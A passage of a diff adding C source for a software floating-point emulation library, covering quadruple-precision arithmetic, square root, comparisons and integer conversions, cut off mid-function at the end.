+*----------------------------------------------------------------------------*/ + +float128 float128_sub( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign == bSign ) { + return subFloat128Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat128Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the quadruple-precision floating-point +| values `a' and `b'. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_mul( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2, zSig3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + bSign = extractFloat128Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( ( aSig0 | aSig1 ) + || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig0 | bSig1 ) == 0 ) goto invalid; + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig0 | aSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( 
aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + zExp = aExp + bExp - 0x4000; + aSig0 |= LIT64( 0x0001000000000000 ); + shortShift128Left( bSig0, bSig1, 16, &bSig0, &bSig1 ); + mul128To256( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1, &zSig2, &zSig3 ); + add128( zSig0, zSig1, aSig0, aSig1, &zSig0, &zSig1 ); + zSig2 |= ( zSig3 != 0 ); + if ( LIT64( 0x0002000000000000 ) <= zSig0 ) { + shift128ExtraRightJamming( + zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 ); + ++zExp; + } + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the quadruple-precision floating-point value +| `a' by the corresponding value `b'. The operation is performed according to +| the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 float128_div( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2; + uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + bSign = extractFloat128Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + goto invalid; + } + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return packFloat128( zSign, 0, 0, 0 ); + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) { + if ( ( aExp | aSig0 | aSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + zExp = aExp - bExp + 0x3FFD; + shortShift128Left( + aSig0 | LIT64( 0x0001000000000000 ), aSig1, 15, &aSig0, &aSig1 ); + shortShift128Left( + bSig0 | LIT64( 0x0001000000000000 ), bSig1, 15, &bSig0, &bSig1 ); + if ( le128( bSig0, bSig1, aSig0, aSig1 ) ) { + shift128Right( aSig0, aSig1, 1, &aSig0, &aSig1 ); + ++zExp; + } + zSig0 = estimateDiv128To64( aSig0, 
aSig1, bSig0 ); + mul128By64To192( bSig0, bSig1, zSig0, &term0, &term1, &term2 ); + sub192( aSig0, aSig1, 0, term0, term1, term2, &rem0, &rem1, &rem2 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + add192( rem0, rem1, rem2, 0, bSig0, bSig1, &rem0, &rem1, &rem2 ); + } + zSig1 = estimateDiv128To64( rem1, rem2, bSig0 ); + if ( ( zSig1 & 0x3FFF ) <= 4 ) { + mul128By64To192( bSig0, bSig1, zSig1, &term1, &term2, &term3 ); + sub192( rem1, rem2, 0, term1, term2, term3, &rem1, &rem2, &rem3 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + add192( rem1, rem2, rem3, 0, bSig0, bSig1, &rem1, &rem2, &rem3 ); + } + zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); + } + shift128ExtraRightJamming( zSig0, zSig1, 0, 15, &zSig0, &zSig1, &zSig2 ); + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the remainder of the quadruple-precision floating-point value `a' +| with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 float128_rem( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, zSign; + int32 aExp, bExp, expDiff; + uint64_t aSig0, aSig1, bSig0, bSig1, q, term0, term1, term2; + uint64_t allZero, alternateASig0, alternateASig1, sigMean1; + int64_t sigMean0; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + if ( aExp == 0x7FFF ) { + if ( ( aSig0 | aSig1 ) + || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + goto invalid; + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return a; + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + expDiff = aExp - bExp; + if ( expDiff < -1 ) return a; + shortShift128Left( + aSig0 | LIT64( 0x0001000000000000 ), + aSig1, + 15 - ( expDiff < 0 ), + &aSig0, + &aSig1 + ); + shortShift128Left( + bSig0 | LIT64( 0x0001000000000000 ), bSig1, 15, &bSig0, &bSig1 ); + q = le128( bSig0, bSig1, aSig0, aSig1 ); + if ( q ) sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); + expDiff -= 64; + while ( 0 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig0 ); + q = ( 4 < q ) ? 
q - 4 : 0; + mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); + shortShift192Left( term0, term1, term2, 61, &term1, &term2, &allZero ); + shortShift128Left( aSig0, aSig1, 61, &aSig0, &allZero ); + sub128( aSig0, 0, term1, term2, &aSig0, &aSig1 ); + expDiff -= 61; + } + if ( -64 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig0 ); + q = ( 4 < q ) ? q - 4 : 0; + q >>= - expDiff; + shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); + expDiff += 52; + if ( expDiff < 0 ) { + shift128Right( aSig0, aSig1, - expDiff, &aSig0, &aSig1 ); + } + else { + shortShift128Left( aSig0, aSig1, expDiff, &aSig0, &aSig1 ); + } + mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); + sub128( aSig0, aSig1, term1, term2, &aSig0, &aSig1 ); + } + else { + shift128Right( aSig0, aSig1, 12, &aSig0, &aSig1 ); + shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); + } + do { + alternateASig0 = aSig0; + alternateASig1 = aSig1; + ++q; + sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); + } while ( 0 <= (int64_t) aSig0 ); + add128( + aSig0, aSig1, alternateASig0, alternateASig1, (uint64_t *)&sigMean0, &sigMean1 ); + if ( ( sigMean0 < 0 ) + || ( ( ( sigMean0 | sigMean1 ) == 0 ) && ( q & 1 ) ) ) { + aSig0 = alternateASig0; + aSig1 = alternateASig1; + } + zSign = ( (int64_t) aSig0 < 0 ); + if ( zSign ) sub128( 0, 0, aSig0, aSig1, &aSig0, &aSig1 ); + return + normalizeRoundAndPackFloat128( aSign ^ zSign, bExp - 4, aSig0, aSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the square root of the quadruple-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 float128_sqrt( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, zExp; + uint64_t aSig0, aSig1, zSig0, zSig1, zSig2, doubleZSig0; + uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, a STATUS_VAR ); + if ( ! aSign ) return a; + goto invalid; + } + if ( aSign ) { + if ( ( aExp | aSig0 | aSig1 ) == 0 ) return a; + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( 0, 0, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFE; + aSig0 |= LIT64( 0x0001000000000000 ); + zSig0 = estimateSqrt32( aExp, (uint32_t)(aSig0>>17) ); + shortShift128Left( aSig0, aSig1, 13 - ( aExp & 1 ), &aSig0, &aSig1 ); + zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); + doubleZSig0 = zSig0<<1; + mul64To128( zSig0, zSig0, &term0, &term1 ); + sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + doubleZSig0 -= 2; + add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); + } + zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); + if ( ( zSig1 & 0x1FFF ) <= 5 ) { + if ( zSig1 == 0 ) zSig1 = 1; + mul64To128( doubleZSig0, zSig1, &term1, &term2 ); + sub128( rem1, 0, term1, term2, &rem1, &rem2 ); + mul64To128( zSig1, zSig1, &term2, &term3 ); + sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + shortShift128Left( 0, zSig1, 1, &term2, &term3 ); + term3 |= 1; + term2 |= doubleZSig0; + add192( rem1, 
rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); + } + zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); + } + shift128ExtraRightJamming( zSig0, zSig1, 0, 14, &zSig0, &zSig1, &zSig2 ); + return roundAndPackFloat128( 0, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_eq( float128 a, float128 b STATUS_PARAM ) +{ + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float128_le( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_lt( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? 
lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_unordered( float128 a, float128 b STATUS_PARAM ) +{ + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float128_eq_quiet( float128 a, float128 b STATUS_PARAM ) +{ + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + return + ( a.low == b.low ) + && ( ( a.high == b.high ) + || ( ( a.low == 0 ) + && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) + ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_le_quiet( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + == 0 ); + } + return + aSign ? 
le128( b.high, b.low, a.high, a.low ) + : le128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float128_lt_quiet( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + return + aSign + && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) + != 0 ); + } + return + aSign ? lt128( b.high, b.low, a.high, a.low ) + : lt128( a.high, a.low, b.high, b.low ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float128_unordered_quiet( float128 a, float128 b STATUS_PARAM ) +{ + if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) + || ( ( extractFloat128Exp( b ) == 0x7FFF ) + && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) + ) { + if ( float128_is_signaling_nan( a ) + || float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/* misc functions */ +float32 uint32_to_float32(uint32_t a STATUS_PARAM) +{ + return int64_to_float32(a STATUS_VAR); +} + +float64 uint32_to_float64(uint32_t a STATUS_PARAM) +{ + return int64_to_float64(a STATUS_VAR); +} + +uint32 float32_to_uint32( float32 a STATUS_PARAM ) +{ + int64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags STATUS_VAR); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float32_to_uint32_round_to_zero( float32 a STATUS_PARAM ) +{ + int64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +int_fast16_t float32_to_int16(float32 a STATUS_PARAM) +{ + int32_t v; + int_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int32(a STATUS_VAR); + if (v < -0x8000) { + res = -0x8000; + } else if (v > 0x7fff) { + res = 0x7fff; + } else { + return v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid 
STATUS_VAR); + return res; +} + +uint_fast16_t float32_to_uint16(float32 a STATUS_PARAM) +{ + int32_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int32(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float32_to_uint16_round_to_zero(float32 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float32_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float64_to_uint32( float64 a STATUS_PARAM ) +{ + uint64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_uint64(a STATUS_VAR); + if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint32 float64_to_uint32_round_to_zero( float64 a STATUS_PARAM ) +{ + uint64_t v; + uint32 res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_uint64_round_to_zero(a STATUS_VAR); + if (v > 0xffffffff) { + res = 0xffffffff; + } else { + return (uint32)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +int_fast16_t float64_to_int16(float64 a STATUS_PARAM) +{ + int64_t v; + int_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int32(a STATUS_VAR); + if (v < -0x8000) { + res = -0x8000; + } else if (v > 0x7fff) { + res = 0x7fff; + } else { + return (int_fast16_t)v; + } + + 
set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float64_to_uint16(float64 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int32(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +uint_fast16_t float64_to_uint16_round_to_zero(float64 a STATUS_PARAM) +{ + int64_t v; + uint_fast16_t res; + int old_exc_flags = get_float_exception_flags(status); + + v = float64_to_int64_round_to_zero(a STATUS_VAR); + if (v < 0) { + res = 0; + } else if (v > 0xffff) { + res = 0xffff; + } else { + return (uint_fast16_t)v; + } + set_float_exception_flags(old_exc_flags, status); + float_raise(float_flag_invalid STATUS_VAR); + return res; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. If the conversion overflows, the +| largest unsigned integer is returned. If 'a' is negative, the value is +| rounded and zero is returned; negative values that do not round to zero +| will raise the inexact exception. 
+*----------------------------------------------------------------------------*/ + +uint64_t float64_to_uint64(float64 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig, aSigExtra; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac(a); + aExp = extractFloat64Exp(a); + aSign = extractFloat64Sign(a); + if (aSign && (aExp > 1022)) { + float_raise(float_flag_invalid STATUS_VAR); + if (float64_is_any_nan(a)) { + return LIT64(0xFFFFFFFFFFFFFFFF); + } else { + return 0; + } + } + if (aExp) { + aSig |= LIT64(0x0010000000000000); + } + shiftCount = 0x433 - aExp; + if (shiftCount <= 0) { + if (0x43E < aExp) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + aSigExtra = 0; + aSig <<= -shiftCount; + } else { + shift64ExtraRightJamming(aSig, 0, shiftCount, &aSig, &aSigExtra); + } + return roundAndPackUint64(aSign, aSig, aSigExtra STATUS_VAR); +} + +uint64_t float64_to_uint64_round_to_zero (float64 a STATUS_PARAM) +{ + int64_t v; + signed char current_rounding_mode = STATUS(float_rounding_mode); + set_float_rounding_mode(float_round_to_zero STATUS_VAR); + v = float64_to_uint64(a STATUS_VAR); + set_float_rounding_mode(current_rounding_mode STATUS_VAR); + return v; +} + +#define COMPARE(s, nan_exp) \ +static inline int float ## s ## _compare_internal( float ## s a, float ## s b, \ + int is_quiet STATUS_PARAM ) \ +{ \ + flag aSign, bSign; \ + uint ## s ## _t av, bv; \ + a = float ## s ## _squash_input_denormal(a STATUS_VAR); \ + b = float ## s ## _squash_input_denormal(b STATUS_VAR); \ + \ + if (( ( extractFloat ## s ## Exp( a ) == nan_exp ) && \ + extractFloat ## s ## Frac( a ) ) || \ + ( ( extractFloat ## s ## Exp( b ) == nan_exp ) && \ + extractFloat ## s ## Frac( b ) )) { \ + if (!is_quiet || \ + float ## s ## _is_signaling_nan( a ) || \ + float ## s ## _is_signaling_nan( b ) ) { \ + float_raise( float_flag_invalid STATUS_VAR); \ + } \ + return float_relation_unordered; \ + } \ 
+ aSign = extractFloat ## s ## Sign( a ); \ + bSign = extractFloat ## s ## Sign( b ); \ + av = float ## s ## _val(a); \ + bv = float ## s ## _val(b); \ + if ( aSign != bSign ) { \ + if ( (uint ## s ## _t) ( ( av | bv )<<1 ) == 0 ) { \ + /* zero case */ \ + return float_relation_equal; \ + } else { \ + return 1 - (2 * aSign); \ + } \ + } else { \ + if (av == bv) { \ + return float_relation_equal; \ + } else { \ + return 1 - 2 * (aSign ^ ( av < bv )); \ + } \ + } \ +} \ + \ +int float ## s ## _compare( float ## s a, float ## s b STATUS_PARAM ) \ +{ \ + return float ## s ## _compare_internal(a, b, 0 STATUS_VAR); \ +} \ + \ +int float ## s ## _compare_quiet( float ## s a, float ## s b STATUS_PARAM ) \ +{ \ + return float ## s ## _compare_internal(a, b, 1 STATUS_VAR); \ +} + +COMPARE(32, 0xff) +COMPARE(64, 0x7ff) + +static inline int floatx80_compare_internal( floatx80 a, floatx80 b, + int is_quiet STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return float_relation_unordered; + } + if (( ( extractFloatx80Exp( a ) == 0x7fff ) && + ( extractFloatx80Frac( a )<<1 ) ) || + ( ( extractFloatx80Exp( b ) == 0x7fff ) && + ( extractFloatx80Frac( b )<<1 ) )) { + if (!is_quiet || + floatx80_is_signaling_nan( a ) || + floatx80_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return float_relation_unordered; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign != bSign ) { + + if ( ( ( (uint16_t) ( ( a.high | b.high ) << 1 ) ) == 0) && + ( ( a.low | b.low ) == 0 ) ) { + /* zero case */ + return float_relation_equal; + } else { + return 1 - (2 * aSign); + } + } else { + if (a.low == b.low && a.high == b.high) { + return 